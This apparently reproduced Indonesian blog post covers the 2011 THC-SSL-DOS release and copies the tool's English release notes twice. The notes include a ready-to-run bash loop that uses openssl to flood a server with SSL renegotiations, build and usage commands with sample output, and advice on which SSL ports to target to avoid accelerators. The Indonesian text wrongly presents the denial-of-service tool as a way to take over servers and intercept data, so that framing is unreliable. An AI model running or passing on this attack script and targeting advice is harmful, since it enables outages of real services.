Tools Hacking [THC-SSL-DOS]
Hacker Temukan Cara Baru Serang Server Web.Sekelompok hacker telah merilis sebuah aplikasi yang memungkinkan seorang pengguna komputer biasa dapat mengambilalih sebuah web server, meski server tersebut menggunakan secure connection.
Tools hacking tersebut adalah THC-SSL-DOS, dirilis hari Senin (24/10/2011). Tools ini bekerja dengan mengeksploitasi bug yang ada di protokol "Secure Sockets Layer (SSL) renegotiation". Menyerang website korban dengan mengirimkan permintaan akses, untuk masuk secure connection, dalam jumlah masif. SSL renegotiation sendiri merupakan sebuah protokol yang mengizinkan sebuat website untuk membuat sebuah kunci keamanan (security key) pada jalur SSL yang ada.
Komunitas hacker Jerman yang terkenal dengan nama Hacker Choice mengatakan THC-SSL-DOS hadir untuk menarik perhatian dan menyiarkan bahwa masih terdapatnya "lubang" dalam SSL, yang memungkinkan data sensitif yang mengalir antara website dan komputer pengguna dapat disadap. "Kami berharap isu keamanan di SSL ini tidak hilang terbawa angin", kata seorang hacker dari komunitas tak dikenal dalam sebuah postingan blog. "Industri ini harus bergerak untuk memperbaiki masalah ini sehingga masyarakat kembali merasa aman dan terlindungi. SSL menggunakan metode yang sudah kuno untuk melindungi data sensitif yang semakin kompleks, SSL sudah tidak cocok digunakan di abad ke-21."
"Pemanfaaatan" bug ini masih dapat dilakukan pada server yang tidak mengaktifkan SSL renegotiation, kata komunitas hacker tersebut, tetapi memerlukan beberapa modifikasi dan beberapa unit komputer pendukung. Komunitas ini mengatakan eksploitasi bug ini masih dapat mengambilalih server umum yang menggunakan koneksi ADSL standar, dari satu unit laptop pribadi. [ secure ]
2011-OCT-24 UPDATE:
SSL-DOS released. Some organizations already found out
about this release a while ago and mistakenly identified it as an
SSL-RENEGOTIATION BUG. This is not true. The tool can be modified to work
without SSL-RENEGOTIATION by just establishing a new TCP connection for every
new handshake.
2011-OCT-24: News Articles:
http://thehackerschoice.wordpress.com/2011/10/24/thc-ssl-dos/
http://www.theregister.co.uk/2011/10/24/ssl_dos_tool_released/
http://www.zdnet.co.uk/news/security-threats/2011/10/25/hacking-tool-targets-ssl-vulnerability-40094270/
http://www.wired.com/threatlevel/2011/10/ssl-dos/
http://news.cnet.com/8301-1009_3-20125058-83/new-attack-tool-targets-web-servers-using-secure-connections/
2011-OCT-25 PRIVATE RELEASE:
People are asking us about the private release that works against servers
that do not support SSL renegotiation. We will not release it.
Meanwhile the good news is that openssl can be used to perform the same attack
It's not as elegant as the private thc-ssl-dos but works quite well indeed.
2 simple commands in bash:
-----BASH SCRIPT BEGIN-----
thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done }
for x in `seq 1 100`; do thc-ssl-dosit & done
-----BASH SCRIPT END-------
Follow @hackerschoice
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
THC-SSL-DOS is a tool to verify the performance of SSL.
Establishing a secure SSL connection requires 15x more processing
power on the server than on the client.
THC-SSL-DOS exploits this asymmetric property by overloading the
server and knocking it off the Internet.
This problem affects all SSL implementations today. The vendors are aware
of this problem since 2003 and the topic has been widely discussed.
This attack further exploits the SSL secure Renegotiation feature
to trigger thousands of renegotiations via single TCP connection.
Download:
Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix Source : thc-ssl-dos-1.4.tar.gz
Use "./configure; make all install" to build.
Usage:
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err
Comparing flood DDoS vs. SSL-Exhaustion attack:
A traditional flood DDoS attack cannot be mounted from a single DSL connection.
This is because the bandwidth of a server is far superior to the
bandwidth of a DSL connection: A DSL connection is not an equal opponent to
challenge the bandwidth of a server.
This is turned upside down for THC-SSL-DOS: The processing capacity for
SSL handshakes is far superior at the client side: A laptop on a DSL
connection can challenge a server on a 30Gbit link.
Traditional DDoS attacks based on flooding are sub optimal: Servers are
prepared to handle large amount of traffic and clients are constantly
sending requests to the server even when not under attack.
The SSL-handshake is only done at the beginning of a secure session and
only if security is required. Servers are _not_ prepared to handle
large amount of SSL Handshakes.
The worst attack scenario is an SSL-Exhaustion attack mounted from
thousands of clients (SSL-DDoS).
Tips & Tricks for whitehats
1. The average server can do 300 handshakes per second. This would require
10-25% of your laptops CPU.
2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
3. Be smart in target acquisition: The HTTPS Port (443) is not always the
best choice. Other SSL enabled ports are more unlikely to use an SSL
Accelerator (like the POP3S, SMTPS, ... or the secure database port).
Counter measurements:
No real solutions exists. The following steps can mitigate (but not solve)
the problem:
1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator
Either of these countermeasures can be circumventing by modifying
THC-SSL-DOS. A better solution is desireable. Somebody should fix
this.
Yours sincerely,
The Hackers Choioce
http://www.thc.org/
Tools hacking tersebut adalah THC-SSL-DOS, dirilis hari Senin (24/10/2011). Tools ini bekerja dengan mengeksploitasi bug yang ada di protokol "Secure Sockets Layer (SSL) renegotiation". Menyerang website korban dengan mengirimkan permintaan akses, untuk masuk secure connection, dalam jumlah masif. SSL renegotiation sendiri merupakan sebuah protokol yang mengizinkan sebuat website untuk membuat sebuah kunci keamanan (security key) pada jalur SSL yang ada.
Komunitas hacker Jerman yang terkenal dengan nama Hacker Choice mengatakan THC-SSL-DOS hadir untuk menarik perhatian dan menyiarkan bahwa masih terdapatnya "lubang" dalam SSL, yang memungkinkan data sensitif yang mengalir antara website dan komputer pengguna dapat disadap. "Kami berharap isu keamanan di SSL ini tidak hilang terbawa angin", kata seorang hacker dari komunitas tak dikenal dalam sebuah postingan blog. "Industri ini harus bergerak untuk memperbaiki masalah ini sehingga masyarakat kembali merasa aman dan terlindungi. SSL menggunakan metode yang sudah kuno untuk melindungi data sensitif yang semakin kompleks, SSL sudah tidak cocok digunakan di abad ke-21."
"Pemanfaaatan" bug ini masih dapat dilakukan pada server yang tidak mengaktifkan SSL renegotiation, kata komunitas hacker tersebut, tetapi memerlukan beberapa modifikasi dan beberapa unit komputer pendukung. Komunitas ini mengatakan eksploitasi bug ini masih dapat mengambilalih server umum yang menggunakan koneksi ADSL standar, dari satu unit laptop pribadi. [ secure ]
Tools hacking ini tersedia di Unix dan Windows binary code. Informasi detail terdapat di
2011-OCT-24 UPDATE:
SSL-DOS released. Some organizations already found out
about this release a while ago and mistakenly identified it as an
SSL-RENEGOTIATION BUG. This is not true. The tool can be modified to work
without SSL-RENEGOTIATION by just establishing a new TCP connection for every
new handshake.
2011-OCT-24: News Articles:
http://thehackerschoice.wordpress.com/2011/10/24/thc-ssl-dos/
http://www.theregister.co.uk/2011/10/24/ssl_dos_tool_released/
http://www.zdnet.co.uk/news/security-threats/2011/10/25/hacking-tool-targets-ssl-vulnerability-40094270/
http://www.wired.com/threatlevel/2011/10/ssl-dos/
http://news.cnet.com/8301-1009_3-20125058-83/new-attack-tool-targets-web-servers-using-secure-connections/
2011-OCT-25 PRIVATE RELEASE:
People are asking us about the private release that works against servers
that do not support SSL renegotiation. We will not release it.
Meanwhile the good news is that openssl can be used to perform the same attack
It's not as elegant as the private thc-ssl-dos but works quite well indeed.
2 simple commands in bash:
-----BASH SCRIPT BEGIN-----
thc-ssl-dosit() { while :; do (while :; do echo R; done) | openssl s_client -connect 127.0.0.1:443 2>/dev/null; done }
for x in `seq 1 100`; do thc-ssl-dosit & done
-----BASH SCRIPT END-------
Follow @hackerschoice
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
THC-SSL-DOS is a tool to verify the performance of SSL.
Establishing a secure SSL connection requires 15x more processing
power on the server than on the client.
THC-SSL-DOS exploits this asymmetric property by overloading the
server and knocking it off the Internet.
This problem affects all SSL implementations today. The vendors are aware
of this problem since 2003 and the topic has been widely discussed.
This attack further exploits the SSL secure Renegotiation feature
to trigger thousands of renegotiations via single TCP connection.
Download:
Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix Source : thc-ssl-dos-1.4.tar.gz
Use "./configure; make all install" to build.
Usage:
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err
Comparing flood DDoS vs. SSL-Exhaustion attack:
A traditional flood DDoS attack cannot be mounted from a single DSL connection.
This is because the bandwidth of a server is far superior to the
bandwidth of a DSL connection: A DSL connection is not an equal opponent to
challenge the bandwidth of a server.
This is turned upside down for THC-SSL-DOS: The processing capacity for
SSL handshakes is far superior at the client side: A laptop on a DSL
connection can challenge a server on a 30Gbit link.
Traditional DDoS attacks based on flooding are sub optimal: Servers are
prepared to handle large amount of traffic and clients are constantly
sending requests to the server even when not under attack.
The SSL-handshake is only done at the beginning of a secure session and
only if security is required. Servers are _not_ prepared to handle
large amount of SSL Handshakes.
The worst attack scenario is an SSL-Exhaustion attack mounted from
thousands of clients (SSL-DDoS).
Tips & Tricks for whitehats
1. The average server can do 300 handshakes per second. This would require
10-25% of your laptops CPU.
2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
3. Be smart in target acquisition: The HTTPS Port (443) is not always the
best choice. Other SSL enabled ports are more unlikely to use an SSL
Accelerator (like the POP3S, SMTPS, ... or the secure database port).
Counter measurements:
No real solutions exists. The following steps can mitigate (but not solve)
the problem:
1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator
Either of these countermeasures can be circumventing by modifying
THC-SSL-DOS. A better solution is desireable. Somebody should fix
this.
Yours sincerely,
The Hackers Choioce
http://www.thc.org/
0 Leave Your Comment :
Post a Comment
Thanks you for your visit please leave your Comment